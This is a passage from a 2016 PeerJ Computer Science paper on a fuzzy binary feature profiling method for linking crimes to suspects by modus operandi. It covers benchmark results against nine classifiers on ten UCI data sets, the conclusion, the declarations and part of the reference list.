the actual crime data set. As shown in the table, there is an increase in the accuracy when the input data set undergoes oversampling. Since the maximum number of instances available under one suspect is equal to 5, under-sampling does not provide a good accuracy. The results prove that the new algorithm works well for a balanced data set as the new method showed an increase in performance when the data set is subjected to an oversampling greater than or equal to 5. Figure 13 shows the change inx AUC with the increase of sampling which starts from under-sampling of 2 and goes on to an over sampling of 90. According to the plot it can be observed that the AUC values are increased when the oversampling is increased. The execution time of the algorithm was 0.001 s when there is no oversampling or under-sampling. The maximum execution time is 0.0031 when there is an oversampling of 90. According to the plot shown in Fig. 14, it is clear that there is an increase of execution time as the oversampling size increases. But, the overall execution time is always remained under 3 ms. Overview of the classification algorithms used for the comparison It is a known fact that there is no single algorithm which can be categorized as the best to solve any problem. Different classification algorithms may perform differently in different situations (Wolpert, 1996). Therefore, the newly proposed method was tested against ten other open classification data sets (The information about these data sets is provided in Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 18/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 13 Change of AUC values with oversampling. Figure 14 Change of time elapsed for the 15 data sets. Table 7) and the performance was evaluated against the results obtained from nine other well-known classification techniques, thereby assessing the quality of the newly proposed method. The nine other classification algorithms include, Logistic Regression, J48 Decision Tree, Radial Basis Function Network (RBFNetwork), Multi-Layer Perceptron (MLP), Naive Bayes Classifier, Sequential Minimal Optimization (SMO) algorithm, KStar instance based classifier, Best-first decision tree (BFTree) classifier, and Logistic Model Tree (LMT) classifier. These classifiers represent four classes of classification algorithms. Namely, function based classifiers, Tree based classifiers, Bayesian classifiers and Lazy classifiers. Logistic Regression learns conditional probability distribution. Relating qualitative variables to other variables through a logistic cumulative distribution functional form is logistic regression (Chang & Lin, 2004). J48 is an open source java implementation of the C4.5 decision tree algorithm (Machine Learning Group at the University of Waikato). A decision tree consists of internal nodes that specify tests on individual input variables Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 19/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 7 Description of the classification data sets for performance comparison. Data set Description Number of instances No of attributes Dermatology data set (Ilter & Guvenir, 1998) This database has been created on a dermatology test carried out on skin samples which have been taken for the evaluation of 22 histopathological features. The val- ues of the histopathological features have been determined by an analysis of the samples under a microscope. In the dataset constructed for this domain, the family history feature has the value 1 if any of these diseases has been observed in the fam- ily, and 0 otherwise. Every other feature (clinical and histopathological) was given a degree in the range of 0 to 3. Here, 0 indicates that the feature was not present, 3 indicates the largest amount possible, and 1, 2 indicate the relative intermediate values. 336 33 Balance scale data set (Hume, 1994) This data set has been generated to model psychological experimental results. Each example is classified as having the balance scale tip to the right, tip to the left, or be balanced. The attributes are the left weight, the left distance, the right weight, and the right distance. The correct way to find the class is the greater of (left-distance * left-weight) and (right-distance * right-weight). If they are equal, it is balanced. There are 3 classes (L, B, R), five levels of Left-Weight (1, 2, 3, 4, 5), five levels of Left-Distance (1, 2, 3, 4, 5), five levels of Right-weight (1, 2, 3, 4, 5) and five levels of Right-Distance (1, 2, 3, 4, 5). 625 4 Balloons data set (Pazzani, 1991a) This data set has been generated using an experiment of stretching a collection of balloons carried out on a group of adults and children (Pazzani, 1991b). In the data set, Inflated is true if (color= yellow and size= small) or (age= adult and act= stretch). In the data set there are two main output classes, namely T if inflated and F if not inflated, two colors yellow and purple, two sizes, large and small, two act types, stretch and dip, and two age groups, adult and child. 20 4 Car evaluation data set (Bohanec & Zupan, 1997a) Car Evaluation Database has been derived from a simple hierarchical decision model originally developed for the demonstration of DEX by Bohanec & Rajkovic (1990). The Car Evaluation Database contains examples with information that is directly related to CAR. They are buying, maint, doors, persons, lug_boot and safety. The attribute buying is the buying price which is considered to have four levels v-high, high, med, low. Maint is the price of the maintenance which contains the four levels, v-high, high, med, low. Doors have the four levels 2, 3, 4, 5-more. Person (capacity in terms of persons to carry), lug_boot (the size of luggage boot) and safety (estimated safety of the car) have 3 levels each. 1,728 6 Soybean data set (Fisher, 1987; Michalski, 1980) This is a small subset of the original soybean database. The data set is distributed over four classes, D1, D2, D3 and D4. The 35 categorical variables represent differ- ent levels of qualities of the soybean vegetable. These categorical variables include, plant-stand, precip, temp, hail, crop-hist, area-damaged, severity, seed-tmt, ger- mination, lant-growth, leaves, leafspots-halo, leafspots-marg, leafspot-size, leaf- shread, leaf-malf, leaf-mild, stem, lodging, stem-cankers, canker-lesion, fruiting- bodies, external, mycelium, int-discolor, sclerotia, fruit-pods, fruit, seed, mold- growth, seed-discolor, seed-size, shriveling and roots. The number of levels repre- sented by each variable varies from 2 to 3. 47 35 Lenses data set (Julien, 1990) Lenses data set is a small database about fitting contact lenses. The data set is com- posed of five attributes including the class variable. The data set has three classes. Age of the patient, spectacle prescription, astigmatic, tear production rate are the attributes of the data set. The attributes contain at least of two categories and at most of three categories. 24 4 (continued on next page) Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 20/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 7 (continued) Data set Description Number of instances No of attributes Nursery data set (Bohanec & Zupan, 1997b) Nursery Database has been derived from a hierarchical decision model originally developed to rank applications for nursery schools. It has been used during several years in 1980s when there has been excessive enrollment to these schools in Ljubl- jana, Slovenia, and the rejected applications frequently needed an objective expla- nation. The final decision depended on three sub problems: occupation of parents and child’s nursery, family structure and financial standing, and social and health picture of the family. The model has been developed within expert system shell for decision making (Bohanec & Rajkovic, 1990). 12,960 8 Tic-tac-toe data set (Aha, 1991) This database encodes the complete set of possible board configurations at the end of tic-tac-toe games, where ‘‘x’’ is assumed to have played first. The target concept is ‘‘win for x’’ (i.e., true when ‘‘x’’ has one of 8 possible ways to create a ‘‘three-in- a-row’’). 958 9 SPECT heart data set (Kurgan & Cios, 2001) The data set describes diagnosis of cardiac Single Proton Emission Computed To- mography (SPECT) images. Each of the patients is classified into two categories: normal and abnormal. The database of 267 SPECT image sets (patients) were pro- cessed to extract features that summarize the original SPECT images. The instances are described by 23 binary attributes including the class variable. 267 22 MONK’s problems data set (Thrun, 1992) The MONK’s problems have been the basis of a first international comparison of learning algorithms. The result of this comparison is summarized in ‘‘The MONK’s Problems’’ (Thrun et al., 1991). There are three MONK’s problems. The domains for all MONK’s problems are the same. The data set is composed of 7 attributes and a binary class variable. 432 7 or attributes that split the data into smaller subsets, and a series of leaf nodes assigning a class to each of the observations in the resulting segments. The C4.5 algorithm constructs decision trees using the concept of information entropy (Quinlan, 1993). Neural networks are flexible in being modeled virtually for any non-linear association between input variables and target variables (Bishop, 1995). Both Radial basis function networks and MLP networks are neural networks (Jayawardena, Fernando & Zhou, 1997). Bayesian classifiers assign the most likely class to a given example described by its feature vector (Rish, 2001). SMO is an implementation of John Platt’s sequential minimal optimization algorithm for training a support vector classifier. It globally replaces all missing values and transforms nominal attributes into binary one. It also normalizes all attributes by default (Platt, 1999; Keerthi et al., 2001). KStar (K*) is an instance-based classifier which uses an entropy–based distance function (Cleary & Leonard, 1995). BFTree uses binary split for both nominal and numeric attributes (Friedman, Hastie & Tibshirani, 2000). LMT is a classifier for building ‘logistic model trees’, which are classification trees with logistic regression functions at the leaves (Landwehr, Hall & Frank, 2005; Sumner, Frank & Hall, 2005). As the newly proposed method accepts only binary input variables, the data sets which are used for the analysis must be preprocessed into the acceptable format. For example, the ‘‘balance scale’’ data set is composed of four attributes. Table 8 shows the attributes and their information of the balance scale data set. Therefore, the data set was adjusted as shown in Fig. 15, prior to using it with the proposed method. Each category of a particular attribute is represented by a dummy variable. For example, Left-Weight attribute results in five attributes in the preprocessed Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 21/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 8 Attribute information of the balance data set. Attribute Number of categories Categories Class name 3 L, B, R Left-weight 5 1, 2, 3, 4, 5 Left-distance 5 1, 2, 3, 4, 5 Right-weight 5 1, 2, 3, 4, 5 Right-distance 5 1, 2, 3, 4, 5 Figure 15 Schematic diagram used for pre-processing of the balance dataset in such a way that it matches the format of inputs of the newly proposed method. data set and each attribute is represented using five binary variables as LW1, LW2, LW3, LW4 and LW5 where the presence of the attribute denotes 1 and 0 otherwise. As depicted in Fig. 15, if Left-Weight has a value of 2 in an instance it results in 1 for the corresponding derived attribute that is LW2. Therefore, if there is an instance where Left-Weight = 2, Left-Distance = 1, Right-Weight = 3 and Right-Distance = 4, Class Name = B, it is represented as LW1=0, LW2=1, LW3=0, LW4=0, LW5=0, LD1=1, LD2=0, LD3 = 0, LD4 = 0, LD5 = 0, RW1 = 0, RW2 = 0, RW3 = 1, RW4 = 0, RW5 = 0, RD1 = 0, RD2 = 0, RD3 = 0, RD4 = 1, RD5 = 0, Class Name = B. The pre-processed data is then fed to the newly proposed algorithm and the nine other algorithms. Performances were compared based on AUC analysis of the ROC curves, and the processing time for model generation. 10 fold cross validation was used under each test for fair testing procedure. For the sake of simplicity, the newly proposed modes operandi analysis algorithm was acronymed as BFPM (Binary feature profiling methodology). As all the data sets which were used for the tests are composed of multi classes, weighted average AUC was used, where each target class is weighted according to its prevalence as given in Eq. (8). Weighted average was used in order to prevent target classes with smaller instance counts from adversely affecting the results (Hempstalk & Frank, 2008). AUCweighted = ∑ ∀ci∈C AUC(ci)×p(ci) (8) Table 9 shows the weighted average AUC values obtained for each data set under each classification algorithm. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 22/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 9 Weighted average AUC values obtained by the algorithms on classifying the data sets. BFPM Logistic regression J48 Radial basis function network Multi-layer perceptron Naive Bayes classifier SMO KStar BFTree LMT Dermatology data set 1 0.9990 0.9750 0.9860 0.9980 0.9980 0.9930 0.9970 0.9690 0.9960 Balance scale data set 0.7945 0.9760 0.8110 0.9680 0.9770 0.9710 0.8830 0.9510 0.8130 0.9810 Balloons data set 1 1 1 1 1 1 1 1 1 1 Car evaluation data set 0.8087 0.9900 0.9760 0.9740 1 0.9760 0.9550 0.9970 0.9940 0.9990 Soybean data set 1 1 0.9860 1 1 0.9760 1 1 0.9740 1 Lenses data set 0.9537 0.7470 0.8400 0.9170 0.8390 0.8700 0.7250 0.8870 0.8670 0.7980 Nursery data set 0.9100 0.9880 0.9950 0.9870 1 0.9820 0.9640 0.9980 0.9990 0.9990 Tic-tac-toe data set 0.9167 0.9960 0.8970 0.7340 0.9940 0.7440 0.9760 0.9990 0.9450 0.9920 SPECT heart data set 0.7857 0.8310 0.7560 0.8400 0.7860 0.8490 0.7070 0.7850 0.7230 0.8410 MONK’s problems data set 0.8333 0.7050 0.9940 0.8130 0.9980 0.7120 0.7460 0.9970 0.9550 0.9880 C ham ikara etal. (2016),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.65 23/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 10 Friedman’s mean rank values returned on the data available in Table 9. Method Mean rank MLP 7.70 LMT 7.10 KStar 6.95 LogisticRegression 5.95 RBFNetworks 5.05 NaiveBayesClassifier 5.05 BFPM 4.95 BFTree 4.50 J48 4.20 SMO 3.55 Friedman’s rank test is a nonparametric test analogous to a standard one-way repeated- measures analysis of variance (Howell, 2013). The Friedman’s rank test results returned on the AUC test data are shown in Table 10. This test returns a test statistic (χ2) value (‘‘Chi-square’’) of 21.339, degree of freedom of 9 and a p-value of 0.011, proving that there is an overall statistically significant difference between the mean ranks of the classification algorithms. According to the table, the highest mean rank is returned for MLP while the lowest mean rank is returned for SMO, proving that MLP provides the best performance while SMO provides the least performance for the 10 data sets tested. Therefore, it indicates that the new model provides a better performance than BFTree, J48 and SMO algorithms for the 10 data sets tested. The average processing times elapsed for each algorithm to classify the data sets are given in Table 11. Friedman’s rank test on the data of Table 11 returned the results shown in Table 12 in which the mean rank values prove better efficiency for the new method than J48, LogisticRegression, SMO, RBFNetworks, BFTree, MLP and LMT. The test statistic (χ2) value (‘‘Chi-square’’) of 73.058, degree of freedom of 9 and a p-value of 0.000, proves that there is an overall statistically significant difference between the mean ranks of the classification algorithms. Friedman’s rank test results for the two measurements, AUC and time elapsed conclude that the newly proposed method provides acceptable results against the nine other well established classification algorithms. CONCLUSION The studies of modus operandi help crime investigation by letting the police officers to solve crimes by linking suspects to crimes. Though there are many descriptive studies available under modus operandi analysis, only a small amount of work is available under computer science. Many of these methods have been derived using the methods based on link analysis. However, the accuracy of these methods is always compromised due to the cognitive biases of the criminals. A novel Fuzzy based Binary Feature Profiling method (BFPM) to find associations between crimes and criminals, using modus operandi is introduced. The newly proposed Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 24/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 11 Average processing time for each algorithm on the classification of the ten data sets. BFPM Logistic regression J48 Radial basis function network Multi-layer perceptron Naive Bayes classifier SMO KStar BFTree LMT Dermatology data set 0.0027 0.3900 0.0800 0.3800 2.7300 0.0500 0.1400 0.2800 0.1100 2.9000 Balance scale data set 0.0030 0.0300 0.0800 0.2200 0.4800 0 0.0500 0 0.0600 0.8400 Balloons data set 0 0 0 0 0.0200 0 0.0200 0 0.0200 0.0500 Car evaluation data set 0.0048 0.4200 0.0300 0.2700 13.4000 0.0200 0.1900 0 0.4800 13.3400 Soybean data set 0.0042 0.0500 0.0700 0.1800 0.4300 0 0.0500 0 0.2300 0.9200 Lenses data set 0.0009 0 0 0.0300 0.0800 0 0.0300 0 0.0100 0.0300 Nursery data set 0.0013 8.8600 0.2500 16.4300 127.8600 0.0300 23.0300 0 7.9900 240.4600 Tic-tac-toe data set 0.0091 0.1900 0.0100 0.1300 18.1800 0.0100 0.6000 0 0.6100 54.6700 SPECT heart data set 0.0073 0.0600 0.0100 0.0700 3.8800 0 0.0400 0 0.2300 2.1500 MONK’s problem data set 0.0058 0.0800 0.0100 0.0600 5.5100 0 0.1300 0 0.2100 1.7200 C ham ikara etal. (2016),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.65 25/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 12 Mean rank values returned by the Friedman’s rank test on the time values available in Table 11. Method Mean rank KStar 2.10 NaiveBayesClassifier 2.35 BFPM 2.75 J48 4.15 LogisticRegression 5.35 SMO 6.25 RBFnetworks 6.35 BFTree 6.90 MLP 9.30 LMT 9.50 method subjects not only the properties of the present, but also the properties of his/her previous convictions. The concept of dynamic modus operandi which is available in the proposed method considers the modi operandi of all of his/her previous convictions to provide a fair rectification to the errors which result due to the human cognition. Dynamic MO uses frequent item set mining to result in a generalized binary feature vector. Complete MO profile also encapsulates past modi operandi of a particular criminal by aggregating the modi operandi of all of his/her previous convictions to one binary feature vector. This feature also guarantees a usage of criminal’s past crime record with more generalizability. Completeness probability measures how much information is available in the new crime which is not available in the complete MO profile. Therefore, this measurement provides the capability of measuring how much extra amount of information is carried by the MO of the new crime. The deviation probability provides a notion about how much the new MO deviates from the most frequent crime flows which are available in the dynamic MO of a particular criminal. The vagueness and the impreciseness prompted the fact that it is not possible to use crisp logic to generate the similarity score. Therefore, a fuzzy inference system was modeled to generate the similarity score. Due to the under-represented and imbalanced properties of the actual data set, the new method has returned a lower performance when it was proposed to the data set without any rectification on the data set. However, with the introduction of over sampling, the method returned a very good performance, allowing one to arrive at the conclusion that the method could provide acceptable results for a balanced data set. The method generated favorable results in providing a good similarity measurement to suggest the connections between crimes and criminals. The fuzzy controller of the new approach guarantees to resemble the human reasoning process by confirming the usage of human operator knowledge to deal with nonlinearity of the actual situation. The newly proposed method was then adapted into a classification algorithm for the validation and comparison with other classification algorithms. The comparison of the new method with the well-established classification algorithms confirmed the generalizability of the new method. The method only provides the capability to process the categorical data sets. If there are any continuous variables in the data set, the values must be introduced with categories Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 26/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 before further processing. The method can be further extended to directly accept the continuous attributes. As the center of gravity method is used for the defuzzification process, further optimizations can be done by simplifying the defuzzification procedure. Adapting the fuzzy inference engine to a Sugeno (Takagi & Sugeno, 1985) type and converting the defuzzification method to a more computationally efficient method such as the weighted average (Wu & Mendel, 2007) method would provide a less complex computation. This would result in even less processing time when the sophistication of the data set rises. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded by the National Research Council (NRC) of Sri Lanka (Grant number: 11-071). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Research Council (NRC): 11-071. Competing Interests The authors declare there are no competing interests. Author Contributions • Mahawaga Arachchige Pathum Chamikara conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Akalanka Galappaththi conceived and designed the experiments, contributed reagents/ materials/analysis tools. • Roshan Dharshana Yapa and Ruwan Dharshana Nawarathna conceived and designed the experiments, performed the experiments, performed the computation work, reviewed drafts of the paper. • Saluka Ranasinghe Kodituwakku conceived and designed the experiments, contributed reagents/materials/analysis tools, reviewed drafts of the paper. • Jagath Gunatilake conceived and designed the experiments, reviewed drafts of the paper. • Aththanapola Arachchilage Chathranee Anumitha Jayathilake conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/ materials/analysis tools, performed the computation work. • Liwan Liyanage conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The data sets were taken from: https://archive.ics.uci.edu/ml/datasets.html. The individual links to separate data sets are provided inline with the text of the paper. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 27/32 https://peerj.com https://archive.ics.uci.edu/ml/datasets.html http://dx.doi.org/10.7717/peerj-cs.65 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.65#supplemental-information. REFERENCES Abraham A, Nath B, Mahanti PK. 2001. Hybrid intelligent systems for stock market analysis. In: Computational science-ICCS. Lecture notes in computer science, vol. 2074. 337–345. Adamo JM. 2001. Data mining for association rules and sequential patterns, Sequential and Parallel Algorithms. 1st edition. New York: Springer Science & Business Media. Agrawal R, Imielinkski J, Swami A. 1993. mining association rule between sets of items in large databases. In: Proceedings of the ACM SIGMOD international conference of management of data. New York: ACM, 207–216. Aha DW. 1991. UCI Machine Learning Repository. Available at https://archive.ics.uci. edu/ml/datasets/Tic-Tac-Toe+Endgame. Bennell C, Canter DV. 2002. Linking commercial burglaries by modus operandi: tests using regression and ROC analysis. Science & Justice 42(3):153–164 DOI 10.1016/S1355-0306(02)71820-0. Bennell C, Jones NJ. 2005. Between a ROC and a hard place: a method for linking serial burglaries by modus operandi. Journal of Investigative Psychology and Offender Profiling 2(1):23–41 DOI 10.1002/jip.21. Berry MJ, Linoff G. 2011. Data mining techniques: for marketing, sales, and customer support. 3rd edition. Hoboken: Wiley. Bishop CM. 1995. Neural networks for pattern recognition. Oxford: Oxford University Press. Bohanec M, Rajkovic V. 1990. Expert system for decision making. Sistemica 1(1):145–157. Bohanec M, Zupan B. 1997a. UCI machine learning repository. Available at https://archive.ics.uci.edu/ml/datasets/Car+Evaluation. Bohanec M, Zupan B. 1997b. UCI machine learning repository. Available at https: //archive.ics.uci.edu/ml/datasets/Nursery. Borg A, Boldt M, Lavesson N, Melander U, Boeva V. 2014. Detecting serial residential burglaries using clustering. Expert Systems with Applications 41(11):5252–5266 DOI 10.1016/j.eswa.2014.02.035. Canter D, Hammond L, Youngs D, Juszczak P. 2013. The efficacy of ideographic models for geograhical offender profiling. Journal of Quantitative Criminology 29(3):423–446 DOI 10.1007/s10940-012-9186-6. Capozzoli A, Lauro F, Khan I. 2015. Fault detection analysis using data mining tech- niques for a cluster of smart office buildings. Expert Systems with Applications 42(9):4324–4338 DOI 10.1016/j.eswa.2015.01.010. Cha SS, Tappert SH, Choi CC. 2010. A survey of binary similarity and distance measures. Journal of Systemics, Cybernetics and Informatics 8(1):43–48. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 28/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65#supplemental-information http://dx.doi.org/10.7717/peerj-cs.65#supplemental-information https://archive.ics.uci.edu/ml/datasets/Tic-Tac-Toe+Endgame https://archive.ics.uci.edu/ml/datasets/Tic-Tac-Toe+Endgame http://dx.doi.org/10.1016/S1355-0306(02)71820-0 http://dx.doi.org/10.1016/S1355-0306(02)71820-0 http://dx.doi.org/10.1002/jip.21 https://archive.ics.uci.edu/ml/datasets/Car+Evaluation https://archive.ics.uci.edu/ml/datasets/Nursery https://archive.ics.uci.edu/ml/datasets/Nursery http://dx.doi.org/10.1016/j.eswa.2014.02.035 http://dx.doi.org/10.1016/j.eswa.2014.02.035 http://dx.doi.org/10.1007/s10940-012-9186-6 http://dx.doi.org/10.1016/j.eswa.2015.01.010 http://dx.doi.org/10.7717/peerj-cs.65 Chamikara MAP, Galappaththi A, Yapa YPRD, Nawarathna RD, Kodituwakku SR, Gunathilake J, Liyanage LH. 2015. A crime data analysis framework with geographical information support for intelligence led policing. PeerJ PrePrints 3:e1909 DOI 10.7287/peerj.preprints.1529v1. Chang YCI, Lin SC. 2004. Synergy of logistic regression and support vector machine in multiple-class classification. In: IDEAL 2004. Lecture notes in computer science, vol. 3177, 132–141. Chen H. 1995. Machine learning for information retrieval: neural. Journal of the Ameri- can Society for Information Science 46(3):194–216 DOI 10.1002/(SICI)1097-4571(199504)46:3<194::AID-ASI4>3.0.CO;2-S. Chen H. 2006. Intelligence and security informatics for international security. 1st edition. Vol. 10. Berlin Heidelberg: Springer. Chen H, Chung W, Xu JJ, Wang G, Qin Y, Chau M. 2014. Crime data mining: a general framework and some examples. Computer 37(0018-9162):50–56 DOI 10.1109/MC.2004.1297301. Chen H, Zeng D, Atabakhsh H, Wyzga W, Schroeder J. 2003. COPLINK: managing law enforcement data and knowledge. Communications of the ACM 46(1):28–34 DOI 10.1145/602421.602441. Chikersal P, Poria S, Cambria E. 2015. SeNTU: sentiment analysis of tweets by combin- ing a rulebased classifier with supervised learning. In: Proceedings of the international workshop on semanti evaluation (SemEval), 647–651. Chisum WJ, Turvey B. 2000. Evidence dynamics: locard’s exchange principle & crime reconstruction. Journal of Behavioral Profiling 1(1):1–15. Cleary JG, Leonard ET. 1995. K∗: an instance-based learner using an entropic distance measure. In: 12th international conference on machine learning, 108–114. Douglas JE, Douglas LK. 2006. Modus operandi and the signature aspects of violent crime. In: Crime classification manual. 2nd edition. San Francisco: Jossey-Bass, 19–30. Estabrooks A, Jo T, Japkowicz N. 2004. A multiple resampling method for learning from imbalanced data sets. Computational Intelligence 20(1):18–36 DOI 10.1111/j.0824-7935.2004.t01-1-00228.x. Fisher D. 1987. UCI machine learning repository. Available at https://archive.ics.uci.edu/ ml/datasets/Soybean+%28Small%29. Friedman J, Hastie T, Tibshirani R. 2000. Additive logistic regression: a statistical view of boosting. Annals of Statistics 28(2):337–407. Godjevac J. 1997. Neuro-fuzzy controllers: design and application. 1st edition. Lausanne: PPUR presses polytechniques et universitaires romandes. Hall M, Frank E, Holmes G, Pfahringer B, Reutemann P, Witten IH. 2009. The WEKA data mining software. ACM SIGKDD Explorations Newsletter 11(1):10 DOI 10.1145/1656274.1656278. Hanley JA, McNeil BJ. 1982. The meaning and use of the area under a receiver operating characteristic (ROC) curve. Radiology 143(1):29–36 DOI 10.1148/radiology.143.1.7063747. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 29/32 https://peerj.com http://dx.doi.org/10.7287/peerj.preprints.1529v1 http://dx.doi.org/10.1002/(SICI)1097-4571(199504)46:3<194::AID-ASI4>3.0.CO;2-S http://dx.doi.org/10.1109/MC.2004.1297301 http://dx.doi.org/10.1109/MC.2004.1297301 http://dx.doi.org/10.1145/602421.602441 http://dx.doi.org/10.1145/602421.602441 http://dx.doi.org/10.1111/j.0824-7935.2004.t01-1-00228.x http://dx.doi.org/10.1145/1656274.1656278 http://dx.doi.org/10.1145/1656274.1656278 http://dx.doi.org/10.1148/radiology.143.1.7063747 http://dx.doi.org/10.7717/peerj-cs.65 Hempstalk K, Frank E. 2008. Discriminating against new classes: one-class versus multi- class classification. In: AI 2008: advances in artificial intelligence: 21st Australasian joint conference on artificial intelligence. Auckland, 325–336. Holdaway S. 1993. Issues in sociology: crime and deviance. Spiral-bound, New edition. Cheltenham: Nelson Thornes Ltd. Howell DC. Fundamental statistics for the behavioral sciences focuses. 8th edition. Belmont: Wadsworth, Cengage Learning. Hume T. 1994. UCI machine learning repository. Available at https://archive.ics.uci.edu/ ml/datasets/Balance+Scale. Ilter N, Guvenir HA. 1998. UCI machine learning repository. Available at https://archive.ics.uci.edu/ml/datasets/Dermatology. Jayawardena AW, Fernando DAK, Zhou MC. 1997. Comparison of multilayer pe- ceptron and radial basis function networks as tools for flood forecasting. IAHS Publications-Series of Proceedings and Reports-International Association of Hydrological Sciences 239:173–182. Julien B. 1990. UCI machine learning repository. Available at https://archive.ics.uci.edu/ ml/datasets/Lenses. Keerthi SS, Shevade SK, Bhattacharyya C, Murthy KRK. 2001. Improvements to Platt’s SMO algorithm for SVM classifier design. Neural Computation 13(3):637–649 DOI 10.1162/089976601300014493. King RD, Sutton GM. 2013. High times for hate crimes: explaining the temporal clustering of hate-motivated offending. Criminology 51(4):871–894 DOI 10.1111/1745-9125.12022. Koperski K, Han J. 1995. Discovery of spatial association rules in geographic informa- tion databases. In: Proceeding of the 4th international symposium on spatial databases, 47–67. Kurgan LA, Cios KJ. 2001. UCI machine learning repository. Available at https://archive.ics.uci.edu/ml/datasets/SPECT+Heart. Landwehr N, Hall M, Frank E. 2005. Logistic model trees. Machine Learning 95(1– 2):161–205 DOI 10.1007/s10994-005-0466-3. Leclerc B, Proulx J, Beauregard E. 2009. Examining the modus operandi of sexual offenders against children and its practical implications. Aggression and Violent Behavior 14(1):5–12 DOI 10.1016/j.avb.2008.08.001. Lin S, Brown DE. 2006. An outlier-based data association method for linking criminal incidents. Decision Support Systems 41(3):604–615 DOI 10.1016/j.dss.2004.06.005. Mamdani EH, Assilina S. 1975. An experiment in linguistic synthesis with a fuzzy logic controller. International Journal of Man-Machine Studies 7(1):1–13 DOI 10.1016/S0020-7373(75)80002-2. MathWorks. 1994–2015a. MathWorks. Available at https://in.mathworks.com/ . MathWorks. 1994–2015b. MathWorks documentation. Available at http://in.mathworks.com/help/matlab/ref/edit.html. MathWorks. 1994–2015c. MathWorks fuzzy logic toolbox. Available at http://in.mathworks.com/help/matlab/ref/edit.html. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 30/32 https://peerj.com https://archive.ics.uci.edu/ml/datasets/Balance+Scale https://archive.ics.uci.edu/ml/datasets/Balance+Scale https://archive.ics.uci.edu/ml/datasets/Dermatology https://archive.ics.uci.edu/ml/datasets/Lenses https://archive.ics.uci.edu/ml/datasets/Lenses http://dx.doi.org/10.1162/089976601300014493 http://dx.doi.org/10.1162/089976601300014493 http://dx.doi.org/10.1111/1745-9125.12022 https://archive.ics.uci.edu/ml/datasets/SPECT+Heart http://dx.doi.org/10.1007/s10994-005-0466-3 http://dx.doi.org/10.1016/j.avb.2008.08.001 http://dx.doi.org/10.1016/j.dss.2004.06.005 http://dx.doi.org/10.1016/S0020-7373(75)80002-2 http://dx.doi.org/10.1016/S0020-7373(75)80002-2 https://in.mathworks.com/ http://in.mathworks.com/help/matlab/ref/edit.html http://in.mathworks.com/help/matlab/ref/edit.html http://dx.doi.org/10.7717/peerj-cs.65 MathWorks Inc. 1994–2015. MathWorks. Available at http://in.mathworks.com/help/ fuzzy/foundations-of-fuzzy-logic.html. Michalski RS. 1980. Learning by being told and learning from examples: an experimental comparison of the two methodes of knowledge acquisition in the context of developing an expert system for soybean desease diagnoiss. International Journal of Policy Analysis and Information Systems 4(2):125–161. Mokros A, Alison LJ. 2002. Is offender profiling possible? Testing the predicted homol- ogy of crime scene actions and background characteristics in a sample of rapists. Legal and Criminological Psychology 7(1):25–43 DOI 10.1348/135532502168360. Oatley G, Ewwart B. 2011. Data mining and crime analysis. Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery 1(2):147–153 DOI 10.1002/widm.6. Palmiotto MJ. 1988. Crime pattern analysis: an investigative tool. Critical Issues in Criminal Investigation 2:59–69. Paternoster R, Bachman R. 2001. Explaining criminals and crime: essays in contemporary criminological theory. Los Angeles: Roxbury Publishing Company. Pazzani M. 1991a. UCI machine learning repository. Available at https://archive.ics.uci.edu/ml/datasets/Balloons. Pazzani M. 1991b. The influence of prior knowledge on concept acquisition: experimen- tal and computational results. Journal of Experimental Psychology: Learning, Memory and Cognition 17(3):416–432. Platt JC. 1999. Fast training of support vector machines using sequential minimal optimization. In: Advances in kernel methods. Cambridge: MIT Press, 185–208. Quinlan JR. 1993. C4.5 programs for machine learning. Machine Learning 16(3):235–240. Refaeilzadeh P, Tang L, Liu H. 2009. Cross-validation. In: Encyclopedia of database systems. 1st edition. New York: Springer US, 532–538. Rish I. 2001. An empirical study of the naive Bayes classifier. Vol. 3. New York, 41–46. Sumner M, Frank E, Hall M. 2005. Speeding up logisti model tree induction. In: 9th European conference on principles and practice of knowledge discovery in databases, 675–683. Sun CT. 1994. Rule-base structure identification in an adaptive-network-based fuzzy in- ference system. IEEE Transactions on Fuzzy Systems 2(1):64–73 DOI 10.1109/91.273127. Takagi T, Sugeno M. 1985. fuzzy identification of systems and its applications to modeling and control. IEEE Transactions on Systems, Man and Cybernetics 1:116–132. The ‘Lectric Law Library. The ‘Lectric Law Library. Available at http://www.lectlaw.com/ files/int20.htm. Thrun S. 1992. UCI machine learning repository. Available at 